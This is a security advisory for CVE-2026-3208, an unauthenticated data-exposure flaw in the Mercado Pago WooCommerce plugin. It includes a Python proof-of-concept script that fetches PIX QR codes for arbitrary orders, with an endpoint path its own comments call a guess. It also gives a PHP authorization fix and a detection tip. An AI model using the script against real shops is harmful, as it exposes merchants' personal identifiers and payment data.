Security Vulnerability Report
CVE-2026-3208 CVSS 5.3 MEDIUM


Published: 2026-05-06 04:16:06
Last Modified: 2026-05-06 13:06:42

Description

The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mp_pix_image' WooCommerce API endpoint in all versions up to, and including, 8.7.11. This makes it possible for unauthenticated attackers to retrieve PIX payment QR code images for arbitrary orders. PIX QR codes contain sensitive merchant information including PIX keys (which may be CPF/CNPJ personal identifiers), transaction amounts, merchant name and city, and MercadoPago transaction references.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)


Mercado Pago payments for WooCommerce <= 8.7.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Sample POC to demonstrate unauthorized access to PIX QR code
# Usage: python poc.py <target_url> <order_id>

def exploit(target_url, order_id):
    # The vulnerable endpoint is usually registered under the WooCommerce API namespace
    # Based on the plugin source (PixGateway.php), the route might be structured like this.
    # Adjust the endpoint path if the specific route prefix differs.
    endpoint = f"{target_url}/wp-json/wc/v3/mp_pix_image"

    # Parameters required to fetch the QR code for a specific order
    params = {
        'order_id': order_id
    }

    try:
        # Send GET request without authentication headers
        response = requests.get(endpoint, params=params, timeout=10)

        if response.status_code == 200:
            print(f"[+] Success! Retrieved data for Order ID: {order_id}")
            print("[+] Content-Type:", response.headers.get('Content-Type'))
            # Assuming the response is the image data (binary)
            # In a real scenario, save this to a file and scan with a QR reader
            print(f"[+] Data length: {len(response.content)} bytes")
            print("[+] Response content preview (first 100 bytes):", response.content[:100])
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] Failed: Access denied. The target might be patched.")
        else:
            print(f"[-] Failed: HTTP {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://example.com"
    oid = "123"
    exploit(target, oid)
```
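The fix for a missing capability check of this kind is an authorization decision inside the endpoint callback, before any order data is read. The block below is an added illustration, not the plugin's own code: it assumes the endpoint is dispatched through WooCommerce's `woocommerce_api_<name>` action, takes `order_id` and `key` query parameters (names chosen for the example), and keeps the rendered PNG as order meta under a made-up key.

```php
<?php
// Added example (not the plugin's code): serve a per-order PIX image only after
// an authorization check. Endpoint wiring, parameter names and the meta key
// used for the image are assumptions made for this illustration.

// WooCommerce routes /?wc-api=<name> (or /wc-api/<name>) to the
// 'woocommerce_api_<name>' action; 'mp_pix_image' is the name in the advisory.
add_action( 'woocommerce_api_mp_pix_image', 'example_serve_pix_image' );

// The decision that a CWE-862 bug of this kind leaves out entirely.
function example_can_view_pix_image( WC_Order $order, string $supplied_key ): bool {
    // Store staff may always view it.
    if ( current_user_can( 'manage_woocommerce' ) ) {
        return true;
    }
    // The logged-in customer who placed the order may view it.
    $customer_id = $order->get_customer_id();
    if ( $customer_id && $customer_id === get_current_user_id() ) {
        return true;
    }
    // A guest checkout proves possession of the unguessable order key
    // (wc_order_...); compare in constant time and never accept an empty key.
    return $supplied_key !== '' && hash_equals( $order->get_order_key(), $supplied_key );
}

function example_pix_image_bytes( WC_Order $order ): string {
    // Assumption for the example: the gateway stored the PNG as order meta.
    return (string) $order->get_meta( '_example_pix_qr_png' );
}

function example_serve_pix_image(): void {
    $order_id = absint( $_GET['order_id'] ?? 0 );
    $key      = sanitize_text_field( wp_unslash( $_GET['key'] ?? '' ) );
    $order    = $order_id ? wc_get_order( $order_id ) : false;

    // One response for "no such order" and "not yours": no order-id oracle.
    if ( ! $order || ! example_can_view_pix_image( $order, $key ) ) {
        status_header( 403 );
        nocache_headers();
        exit;
    }

    nocache_headers();
    header( 'Content-Type: image/png' );
    header( 'Content-Disposition: inline; filename="pix-' . $order_id . '.png"' );
    echo example_pix_image_bytes( $order );
    exit;
}
```

On the detection side, unauthenticated requests to the `mp_pix_image` endpoint that walk through many `order_id` values are the pattern to alert on; the 403 branch above makes such scans visible in server logs without disclosing which IDs exist.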

Weakness
CWE-862 (Missing Authorization)

Status
Deferred

References

https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L358
https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L92
https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoocommerce-mercadopago/tags/8.7.11&new_path=%2Fwoocommerce-mercadopago/tags/8.7.12
https://www.wordfence.com/threat-intel/vulnerabilities/id/986e0252-b94d-4ac8-9083-0218fa8a651e?source=cve